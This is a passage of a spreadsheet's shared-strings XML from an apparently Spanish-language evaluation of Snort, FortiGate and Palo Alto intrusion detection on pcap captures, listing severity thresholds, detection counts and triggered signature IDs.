        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> ] || [App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>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 3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>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 2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Snort</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> [Priority </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&lt;= 1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> [IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)] ||
[App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)]</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>PA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> [IPS severity_number</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> &gt;=1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)] ||
[App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [IPS severity="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any"</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>] ||
 [APP apprisk="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <t>Flujos/Mensajes/Instancias con Ataque Detectados Snort: el hecho de que se lleve a cabo una detección del 100% en instancias pero menor del 100% en flujos y mensajes se debe a la no asociación de algunas alertas a flujos y paquetes (estas alertas no contienen información del paquete asociado, por lo que no puede contabilizarse como una detección válida de flujo/mensaje, aunque a niveles prácticos actuaría como un 100%).</t>
  </si>
  <si>
    <t>Ataques Detectados: hay algunas inyecciones SQL que por su sintaxis no son detectadas por Snort</t>
  </si>
  <si>
    <t>Nº pcaps requieren fragmentación</t>
  </si>
  <si>
    <t>Nº pcaps NO válidos para FG/PA</t>
  </si>
  <si>
    <t>Nº pcaps válidos directamente para FG/PA</t>
  </si>
  <si>
    <t>Total pcapss evaluados para FG/PA</t>
  </si>
  <si>
    <t>Talos Registered, descomentando todas las reglas (#) y todos los "include" de ficheros ".rules" (salvo el fichero "deleted.rules", con "DELETED" al principio del "msg")
Fusión de todos los ficheros ".rules" del paquete</t>
  </si>
  <si>
    <t>%Detection_pcaps</t>
  </si>
  <si>
    <t>%Detection_pcaps
AttackID</t>
  </si>
  <si>
    <t>%Detection_pcaps
ThreatID</t>
  </si>
  <si>
    <t>Nº pcaps detectados</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Ataques </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>POR PCAPS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
(TP, FN)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Legítimo </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>POR FLUJOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
(FP, TN)</t>
    </r>
  </si>
  <si>
    <t>Origen</t>
  </si>
  <si>
    <t>Nuevos</t>
  </si>
  <si>
    <t>CIC2018</t>
  </si>
  <si>
    <t>1 (1)</t>
  </si>
  <si>
    <t>12 (4), 15 (1)</t>
  </si>
  <si>
    <t>12, 15</t>
  </si>
  <si>
    <t>12 (4), 2002752 (2), 2002749 (2), 15 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 15</t>
  </si>
  <si>
    <t>35662</t>
  </si>
  <si>
    <t>16060</t>
  </si>
  <si>
    <t>31914</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 33 (1), 18 (1), 3 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 33, 18, 3</t>
  </si>
  <si>
    <t>41469</t>
  </si>
  <si>
    <t>14978, 9999</t>
  </si>
  <si>
    <t>ssl</t>
  </si>
  <si>
    <t>18 (2), 3 (1), 41701 (1)</t>
  </si>
  <si>
    <t>18, 3, 41701</t>
  </si>
  <si>
    <t>18 (2), 2002752 (2), 2002749 (2), 3 (1), 41701 (1)</t>
  </si>
  <si>
    <t>18, 2002752, 2002749, 3, 41701</t>
  </si>
  <si>
    <t>41701 (1)</t>
  </si>
  <si>
    <t>41701</t>
  </si>
  <si>
    <t>53580</t>
  </si>
  <si>
    <t>15897, 16265</t>
  </si>
  <si>
    <t>incomplete</t>
  </si>
  <si>
    <t>2027792 (5), 2027794 (5), 2027793 (5), 2027326 (2)</t>
  </si>
  <si>
    <t>2027792, 2027794, 2027793, 2027326</t>
  </si>
  <si>
    <t>50447 (83), 12 (15), 44489 (1)</t>
  </si>
  <si>
    <t>50447, 12, 44489</t>
  </si>
  <si>
    <t>2101620 (19), 2027792 (5), 2027794 (5), 2027793 (5), 2002752 (3), 2002749 (3), 2027326 (2), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059115 (1), 2059106 (1), 2059107 (1)</t>
  </si>
  <si>
    <t>2101620, 2027792, 2027794, 2027793, 2002752, 2002749, 2027326, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059114, 2059115, 2059106, 2059107</t>
  </si>
  <si>
    <t>50447 (83), 2101620 (19), 12 (15), 2027792 (5), 2027794 (5), 2027793 (5), 2002752 (3), 2002749 (3), 2027326 (2), 44489 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059115 (1), 2059106 (1), 2059107 (1)</t>
  </si>
  <si>
    <t>50447, 2101620, 12, 2027792, 2027794, 2027793, 2002752, 2002749, 2027326, 44489, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059114, 2059115, 2059106, 2059107</t>
  </si>
  <si>
    <t>50447 (83), 44489 (1)</t>
  </si>
  <si>
    <t>50447, 44489</t>
  </si>
  <si>
    <t>50447 (83), 2027792 (5), 2027794 (5), 2027793 (5), 2027326 (2), 44489 (1)</t>
  </si>
  <si>
    <t>50447, 2027792, 2027794, 2027793, 2027326, 44489</t>
  </si>
  <si>
    <t>2101620 (19), 2002752 (3), 2002749 (3)</t>
  </si>
  <si>
    <t>2101620, 2002752, 2002749</t>
  </si>
  <si>
    <t>2101620 (19), 12 (15), 2002752 (3), 2002749 (3)</t>
  </si>
  <si>
    <t>2101620, 12, 2002752, 2002749</t>
  </si>
  <si>
    <t>2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059115 (1), 2059106 (1), 2059107 (1)</t>
  </si>
  <si>
    <t>2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059114, 2059115, 2059106, 2059107</t>
  </si>
  <si>
    <t>29511</t>
  </si>
  <si>
    <t>52169</t>
  </si>
  <si>
    <t>10000483</t>
  </si>
  <si>
    <t>92322, 9999</t>
  </si>
  <si>
    <t>85585</t>
  </si>
  <si>
    <t>ms-ds-smbv3</t>
  </si>
  <si>
    <t>web-browsing</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 33 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 33</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2010937 (1), 2010935 (1), 2101418 (1), 2010936 (1), 2100615 (1), 2010939 (1), 2002910 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2010937, 2010935, 2101418, 2010936, 2100615, 2010939, 2002910</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 1421 (1), 1418 (1), 2010937 (1), 2010935 (1), 2101418 (1), 2010936 (1), 2100615 (1), 2010939 (1), 2002910 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 1421, 1418, 2010937, 2010935, 2101418, 2010936, 2100615, 2010939, 2002910</t>
  </si>
  <si>
    <t>43814</t>
  </si>
  <si>
    <t>402 (28), 12 (11)</t>
  </si>
  <si>
    <t>402, 12</t>
  </si>
  <si>
    <t>2002749 (8), 2044073 (6), 2002752 (2)</t>
  </si>
  <si>
    <t>2002749, 2044073, 2002752</t>
  </si>
  <si>
    <t>402 (28), 12 (11), 2002749 (8), 2044073 (6), 2002752 (2)</t>
  </si>
  <si>
    <t>402, 12, 2002749, 2044073, 2002752</t>
  </si>
  <si>
    <t>2002749 (8), 2002752 (2)</t>
  </si>
  <si>
    <t>2002749, 2002752</t>
  </si>
  <si>
    <t>12 (11), 2002749 (8), 2002752 (2)</t>
  </si>
  <si>
    <t>12, 2002749, 2002752</t>
  </si>
  <si>
    <t>402 (28), 2044073 (6)</t>
  </si>
  <si>
    <t>402, 2044073</t>
  </si>
  <si>
    <t>40169</t>
  </si>
  <si>
    <t>dns-base</t>
  </si>
  <si>
    <t>12 (3), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749</t>
  </si>
  <si>
    <t>50447 (38), 1917 (20), 12 (4), 15 (1)</t>
  </si>
  <si>
    <t>50447, 1917, 12, 15</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>50447 (38), 1917 (20), 12 (4), 2002752 (2), 2002749 (2), 15 (1), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>50447, 1917, 12, 2002752, 2002749, 15, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>50447 (38)</t>
  </si>
  <si>
    <t>50447 (38), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>50447, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>94634, 9999</t>
  </si>
  <si>
    <t>incomplete, unknown-tcp</t>
  </si>
  <si>
    <t>2003303 (31), 2003410 (31), 2015016 (31), 2002752 (2), 2002749 (2), 2000418 (1), 2036752 (1)</t>
  </si>
  <si>
    <t>2003303, 2003410, 2015016, 2002752, 2002749, 2000418, 2036752</t>
  </si>
  <si>
    <t>12 (63), 2003303 (31), 2003410 (31), 2015016 (31), 2002752 (2), 2002749 (2), 2000418 (1), 2036752 (1)</t>
  </si>
  <si>
    <t>12, 2003303, 2003410, 2015016, 2002752, 2002749, 2000418, 2036752</t>
  </si>
  <si>
    <t>2000418 (1), 2036752 (1)</t>
  </si>
  <si>
    <t>2000418, 2036752</t>
  </si>
  <si>
    <t>12 (63), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2003303 (31), 2003410 (31), 2015016 (31)</t>
  </si>
  <si>
    <t>2003303, 2003410, 2015016</t>
  </si>
  <si>
    <t>12449, 46002</t>
  </si>
  <si>
    <t>ftp</t>
  </si>
  <si>
    <t>18469 (4), 44489 (1)</t>
  </si>
  <si>
    <t>18469, 44489</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 2002752 (1), 2002749 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059107 (1), 2059106 (1), 2059104 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 2002752, 2002749, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059101, 2059109, 2059103, 2059114, 2059107, 2059106, 2059104</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 18469 (4), 44489 (1), 2002752 (1), 2002749 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059107 (1), 2059106 (1), 2059104 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 18469, 44489, 2002752, 2002749, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059101, 2059109, 2059103, 2059114, 2059107, 2059106, 2059104</t>
  </si>
  <si>
    <t>44489 (1)</t>
  </si>
  <si>
    <t>44489</t>
  </si>
  <si>
    <t>2002752 (1), 2002749 (1)</t>
  </si>
  <si>
    <t>18469 (4)</t>
  </si>
  <si>
    <t>18469</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059107 (1), 2059106 (1), 2059104 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059101, 2059109, 2059103, 2059114, 2059107, 2059106, 2059104</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 18469 (4), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059107 (1), 2059106 (1), 2059104 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 18469, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059101, 2059109, 2059103, 2059114, 2059107, 2059106, 2059104</t>
  </si>
  <si>
    <t>92322</t>
  </si>
  <si>
    <t>33836</t>
  </si>
  <si>
